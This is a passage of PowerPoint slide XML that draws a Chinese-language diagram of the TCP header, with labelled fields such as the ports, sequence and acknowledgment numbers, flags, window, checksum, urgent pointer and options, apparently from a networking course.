      <p:bldP spid="28691" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="28692" grpId="0" bldLvl="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104"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="657225" y="6289675"/>
            <a:ext cx="635000" cy="252413"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 62893"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="hlink"/>
          </a:solidFill>
          <a:ln w="12700">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5" name="Rectangle 105"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1258888" y="6164263"/>
            <a:ext cx="1225550" cy="504825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CCFF99"/>
          </a:solidFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="333399"/>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6" name="Line 106"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="928688" y="1697038"/>
            <a:ext cx="15875" cy="2757487"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="bg2"/>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Rectangle 107"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="638175" y="2767013"/>
            <a:ext cx="587375" cy="530225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>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90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="333399"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>TCP</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600">
              <a:solidFill>
                <a:srgbClr val="333399"/>
              </a:solidFill>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="333399"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>首部</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:srgbClr val="333399"/>
              </a:solidFill>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79878" name="Line 108"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8453438" y="1690688"/>
            <a:ext cx="0" cy="2316162"/>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9" name="Rectangle 109"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8002588" y="2509838"/>
            <a:ext cx="1073150" cy="530225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>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lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="333399"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>20 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="333399"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>字节的</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:srgbClr val="333399"/>
              </a:solidFill>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="333399"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>固定首部</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:srgbClr val="333399"/>
              </a:solidFill>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79880" name="Rectangle 110"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1217613" y="1695450"/>
            <a:ext cx="6810375" cy="2763838"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFCC"/>
          </a:solidFill>
          <a:ln w="25400">
            <a:solidFill>
              <a:schemeClr val="bg2"/>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81" name="Freeform 111"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1227138" y="4459288"/>
            <a:ext cx="6826250" cy="757237"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 4626"/>
              <a:gd name="T1" fmla="*/ 0 h 544"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 4626"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 544"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 4626"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 544"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 4626"/>
              <a:gd name="T7" fmla="*/ 0 h 544"/>
              <a:gd name="T8" fmla="*/ 0 w 4626"/>
              <a:gd name="T9" fmla="*/ 0 h 544"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 60000 65536"/>
              <a:gd name="T13" fmla="*/ 0 60000 65536"/>
              <a:gd name="T14" fmla="*/ 0 60000 65536"/>
              <a:gd name="T15" fmla="*/ 0 w 4626"/>
              <a:gd name="T16" fmla="*/ 0 h 544"/>
              <a:gd name="T17" fmla="*/ 4626 w 4626"/>
              <a:gd name="T18" fmla="*/ 544 h 544"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T10">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T12">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T13">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="T14">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T15" t="T16" r="T17" b="T18"/>
            <a:pathLst>
              <a:path w="4626" h="544">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="861" y="544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1814" y="544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4626" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="B2B28E"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="FFFFCC"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"/>
          </a:gra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79882" name="Line 112"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1211263" y="2165350"/>
            <a:ext cx="6821487"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3" name="Line 113"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1223963" y="2630488"/>
            <a:ext cx="6808787"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114"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1211263" y="3094038"/>
            <a:ext cx="6821487"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115"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1211263" y="3557588"/>
            <a:ext cx="6821487"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116"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1223963" y="4022725"/>
            <a:ext cx="6808787"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117"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4624388" y="1700213"/>
            <a:ext cx="0" cy="47466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Rectangle 118"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5688013" y="1785938"/>
            <a:ext cx="13366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目  的  端  口</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:srgbClr val="333399"/>
              </a:solidFill>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79889" name="Rectangle 119"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1354138" y="3035300"/>
            <a:ext cx="5873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数据</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:srgbClr val="333399"/>
              </a:solidFill>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="333399"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>偏移</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:srgbClr val="333399"/>
              </a:solidFill>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79890" name="Rectangle 120"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2309813" y="3649663"/>
            <a:ext cx="11334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检   验   和</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:srgbClr val="333399"/>
              </a:solidFill>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79891" name="Rectangle 121"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2489200" y="4078288"/>
            <a:ext cx="283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选    项    （长  度  可  变）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:srgbClr val="333399"/>
              </a:solidFill>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79892" name="Rectangle 122"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2411413" y="1785938"/>
            <a:ext cx="1019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源  端  口</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:srgbClr val="333399"/>
              </a:solidFill>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79893" name="Rectangle 123"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4230688" y="2244725"/>
            <a:ext cx="7699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序   号</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:srgbClr val="333399"/>
              </a:solidFill>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79894" name="Line 124"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4629150" y="3100388"/>
            <a:ext cx="0" cy="915987"/>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5" name="Rectangle 125"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5545138" y="3649663"/>
            <a:ext cx="1508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紧   急   指   针</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:srgbClr val="333399"/>
              </a:solidFill>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79896" name="Rectangle 126"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5943600" y="3168650"/>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窗   口</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:srgbClr val="333399"/>
              </a:solidFill>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79897" name="Rectangle 127"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4013200" y="2728913"/>
            <a:ext cx="12969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确    认    号</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:srgbClr val="333399"/>
              </a:solidFill>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79898" name="Line 128"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2065338" y="3100388"/>
            <a:ext cx="0" cy="4635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wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79899" name="Line 129"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3773488" y="3095625"/>
            <a:ext cx="0" cy="45720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0" name="Line 130"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3335338" y="3100388"/>
            <a:ext cx="0" cy="46355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1" name="Line 131"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3552825" y="3100388"/>
            <a:ext cx="0" cy="45561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2" name="Line 132"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4198938" y="3100388"/>
            <a:ext cx="0" cy="45561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3" name="Line 133"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3986213" y="3100388"/>
            <a:ext cx="0" cy="45561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4" name="Line 134"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4416425" y="3100388"/>
            <a:ext cx="0" cy="45561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5" name="Rectangle 135"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2332038" y="3178175"/>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保   留</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:srgbClr val="333399"/>
              </a:solidFill>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79906" name="Rectangle 136"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="439102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lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="333399"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>F</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="1">
              <a:solidFill>
                <a:srgbClr val="333399"/>
              </a:solidFill>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="333399"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="1">
              <a:solidFill>
                <a:srgbClr val="333399"/>
              </a:solidFill>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="333399"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>N</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="1">
              <a:solidFill>
                <a:srgbClr val="333399"/>
              </a:solidFill>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79907" name="Line 137"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1228725" y="1082675"/>
            <a:ext cx="679450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8" name="Rectangle 138"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4292600" y="922338"/>
            <a:ext cx="727075" cy="363537"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>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a:solidFill>
                  <a:srgbClr val="333399"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>32 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="333399"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>位</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="333399"/>
              </a:solidFill>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79909" name="Line 139"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1214438" y="1590675"/>
            <a:ext cx="6800850"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0" name="Line 140"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1214438" y="1457325"/>
            <a:ext cx="0" cy="13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1" name="Line 141"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="142716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2" name="Line 142"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="163988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Line 143"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="185261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4" name="Line 144"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="206533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5" name="Line 145"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="227806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6" name="Line 146"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="248920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Line 147"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="270192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8" name="Line 148"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2914650" y="1457325"/>
            <a:ext cx="0" cy="13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9" name="Line 149"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="312737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0" name="Line 150"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="334010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1" name="Line 151"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="355282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2" name="Line 152"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="376555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3" name="Line 153"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="397827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4" name="Line 154"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="418941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5" name="Line 155"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="440213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6" name="Line 156"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4614863" y="1457325"/>
            <a:ext cx="0" cy="13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7" name="Line 157"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="482758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8" name="Line 158"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
